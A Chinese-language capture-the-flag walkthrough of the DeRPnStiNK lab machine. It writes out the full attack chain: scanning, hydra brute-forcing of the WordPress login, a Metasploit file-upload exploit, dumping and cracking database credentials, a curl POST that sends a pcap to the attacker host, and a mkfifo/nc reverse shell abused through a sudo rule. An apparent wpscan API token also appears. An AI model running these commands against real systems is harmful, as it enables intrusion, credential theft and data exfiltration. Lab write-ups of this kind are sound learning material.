端口
nmap主机发现
nmap -sn 192.168.159.120/24
Nmap scan report for 192.168.159.120
Host is up (0.00020s latency).
120是新出现的机器,他就是靶机
nmap端口扫描
nmap -Pn 192.168.159.120 -p- --min-rate 10000 -oA nmap/scan
扫描开放端口保存到 nmap/scan下
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http 发现开放3个端口
nmap -sT -sC -sV -O -p21,22,80 -oA nmap/scan 192.168.159.120详细端口扫描:
-sT:完整tcp连接
-sC:默认脚本扫描
-sV:服务版本探测
-O:系统信息探测
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 124ef86e7b6cc6d87cd82977d10beb72 (DSA)
| 2048 72c51c5f817bdd1afb2e5967fea6912f (RSA)
| 256 06770f4b960a3a2c3bf08c2b57b597bc (ECDSA)
|_ 256 28e8ed7c607f196ce3247931caab5d2d (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
分析:
21 ftp端口开放
80 web端口开放
22 ssh端口开放
21端口匿名登录不上去
看80端口,主页面只有两张图片,我们看源代码页面:
敏感信息1:<script type="text/info" src="/webnotes/info.txt"></script>
敏感信息2:注释<--flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) -->
立足
/webnotes/info.txt:
<-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live -->
/webnotes:
[stinky@DeRPnStiNK /var/www/html ]$ whois derpnstink.localDomain Name: derpnstink.localRegistry Domain ID: 2125161577_DOMAIN_COM-VRSNRegistrar WHOIS Server: whois.fakehosting.comRegistrar URL: http://www.fakehosting.comUpdated Date: 2017-11-12T16:13:16ZCreation Date: 2017-11-12T16:13:16ZRegistry Expiry Date: 2017-11-12T16:13:16ZRegistrar: fakehosting, LLCRegistrar IANA ID: 1337Registrar Abuse Contact Email: stinky@derpnstink.localRegistrar Abuse Contact Phone:Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
DNSSEC: unsignedURL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/综合以上信息:
我们需要给ip绑定一个host头derpnstink.local,以便于后续正常访问服务
vim /etc/hosts
192.168.159.120 derpnstink.local
目录扫描
gobuster dir -u http://derpnstink.local/ -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html --add-slash
发现:
/weblog/ (Status: 200) [Size: 15172]
再扫一遍weblog目录,
gobuster dir -u http://derpnstink.local/weblog -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html --add-slash
:
/.html/ (Status: 403) [Size: 296]
/.php/ (Status: 403) [Size: 295]
/index.php/ (Status: 301) [Size: 0] [--> http://derpnstink.local/weblog/]
/wp-content/ (Status: 200) [Size: 0]
/wp-login.php/ (Status: 200) [Size: 2796]
/wp-includes/ (Status: 403) [Size: 302]
/wp-admin/ (Status: 302) [Size: 0] [--> http://derpnstink.local/weblog/wp-login.php?redirect_to=http%3A%2F%2Fderpnstink.local%2Fweblog%2Fwp-admin%2F&reauth=1]
/xmlrpc.php/ (Status: 405) [Size: 42]
/.php/ (Status: 403) [Size: 295]
/.html/ (Status: 403) [Size: 296]
/wp-signup.php/ (Status: 302) [Size: 0] [--> http://derpnstink.local/weblog/wp-login.php?action=register]
显然是个博客,貌似还是wordpress,我的插件检测到了这就是wordpress,版本是4.6.29
wpscan扫描
wpscan扫描一下:
wpscan --url http://derpnstink.local/weblog/ --api-token BQt8Nu27fqP76gJ44k9M5Z5AOuwQcc40k4YBs6lAUMY --disable-tls-checks
扫出了一个任意文件上传漏洞,其他的都是csrf或xss的跨站攻击
Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload
这个漏洞我试了半天,当尝试msf利用此漏洞时,才发现他是需要验证的文件上传漏洞(Authenticated Arbitrary File Upload),也就是我们需要一个用户才能利用此漏洞
hydra爆破用户和密码
我们使用hydra爆破wordpress有哪些用户:
hydra -p 123 -L /usr/share/wordlists/SecLists-master/Usernames/top-usernames-shortlist.txt derpnstink.local http-post-form "/weblog/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fderpnstink.local%2Fweblog%2Fwp-admin%2F&testcookie=1:Invalid"
解释一下:http-post-form表单数据是我提前用burp抓下来的,其中log=^USER^&pwd=^PASS^,分别是用户名密码及其占位符
Invalid表示回显中有“Invalid”字符串的结果不是我们想要的
抓到一个用户admin
我们使用hydra爆破admin的密码:
hydra -P /usr/share/wordlists/SecLists-master/Passwords/darkweb2017-top10000.txt -l admin derpnstink.local http-post-form "/weblog/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fderpnstink.local%2Fweblog%2Fwp-admin%2F&testcookie=1:incorrect|empty"
成功爆破:
[80][http-post-form] host: derpnstink.local login: admin password: admin
验证的文件上传漏洞利用(CVE-2014-5460)
https://nvd.nist.gov/vuln/detail/CVE-2014-5460
search slideshow
结果:
1 exploit/unix/webapp/wp_slideshowgallery_upload 2014-08-28 excellent Yes Wordpress SlideShow Gallery Authenticated File Upload
use 1
option这样设置:
Basic options:Name Current Setting Required Description---- --------------- -------- -----------Proxies no A proxy chain of format type:host:port[,type:host:port][...]RHOSTS derpnstink.local yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitRPORT 80 yes The target port (TCP)SSL false no Negotiate SSL/TLS for outgoing connectionsTARGETURI /weblog yes The base path to the wordpress applicationVHOST no HTTP server virtual hostWP_PASSWORD admin yes Valid password for the provided usernameWP_USER admin yes A valid usernamerun 一下直接getshell : www-data
提权
信息枚举
还是之前配置错误信息收集,没什么敏感的,接下来尝试敏感文件收集
find /var/www -name *conf* 2>/dev/null
/var/www/html/weblog/wp-config.php
/var/www/html/weblog/wp-includes/images/smilies/icon_confused.gif
/var/www/html/weblog/wp-content/plugins/akismet/views/config.php
/var/www/html/weblog/wp-config-sample.php
/var/www/html/weblog/wp-admin/setup-config.php
cat /var/www/html/weblog/wp-config.php 获取到数据库登录用户密码
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'mysql');
mysql登录后一顿查,最后翻出来了:
+------------------+-------------------------------------------+
| User | Password |
+------------------+-------------------------------------------+
| root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |
| root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |
| root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |
| root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |
| debian-sys-maint | *B95758C76129F85E0D68CF79F38B66F156804E93 |
| unclestinky | *9B776AFB479B31E8047026F1185E952DD1E530CB |
| phpmyadmin | *4ACFE3202A5FF5CF467898FC58AAB1D615029441 |
+------------------+-------------------------------------------+
unclestinky $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
admin $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/
cat /etc/passwd:看到unclestinky对应的用户是stinky
破解$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41:wedgie57
su切换一下用户,成功了
cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
我擦,flag2没找到直接到flag3了,算了等root后再说(虽然root后就懒得找了)
简单配置错误信息枚举后,没有可利用配置错误提权,直接收集下敏感信息
/home/stinky/Documents下有:
-rw-r--r-- 1 root root 4391468 Nov 13 2017 derpissues.pcap
pcap是抓的数据包
是root创建的,非常可疑,直接考下来wireshark分析
推荐一个很吊的脚本getfile.py,用于获取靶机上的文件
import http.server
import os
class SimpleHTTPRequestHandler(http.server.BaseHTTPRequestHandler):def do_POST(self):content_length = int(self.headers['Content-Length'])post_data = self.rfile.read(content_length)# 保存上传的文件with open("uploaded_file", 'wb') as f:f.write(post_data)
# 返回成功响应self.send_response(200)self.end_headers()self.wfile.write(b'File uploaded successfully.')
if __name__ == "__main__":PORT = 8000server_address = ("", PORT)httpd = http.server.HTTPServer(server_address, SimpleHTTPRequestHandler)print(f"Serving on port {PORT}")httpd.serve_forever()
攻击机器:python getfile.py后
直接再靶机上:curl -X POST --data-binary @./derpissues.pcap http://192.168.159.47:8000/
是不是非常方便,用不着scp那么麻烦,而且需要用户身份验证
简单分析获取mrderp用户密码
登录后,sudo -l看一下
Matching Defaults entries for mrderp on DeRPnStiNK:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mrderp may run the following commands on DeRPnStiNK:(ALL) /home/mrderp/binaries/derpy*
直接:echo "mkfifo /tmp/f;nc 192.168.159.47 1234 0</tmp/f|/bin/sh > /tmp/f 2>&1;rm /tmp/f" > /home/mrderp/binaries/derpy.sh
然后:
攻击机器:nc -nvlp 1234
靶机:sudo /home/mrderp/binaries/derpy.sh
获取到root权限
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
补:flag2
flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)
使用unclestinky用户登录wordpress后台管理页面,在Dashboard中看到
之前查数据库时候
+------------------+-------------------------------------------+
| User | Password |
+------------------+-------------------------------------------+
| root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |
| root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |
| root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |
| root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA |
| debian-sys-maint | *B95758C76129F85E0D68CF79F38B66F156804E93 |
| unclestinky | *9B776AFB479B31E8047026F1185E952DD1E530CB | <===========用来登录 wordpress
| phpmyadmin | *4ACFE3202A5FF5CF467898FC58AAB1D615029441 |
+------------------+-------------------------------------------+
unclestinky $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 <======= 用来登录ssh
admin $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/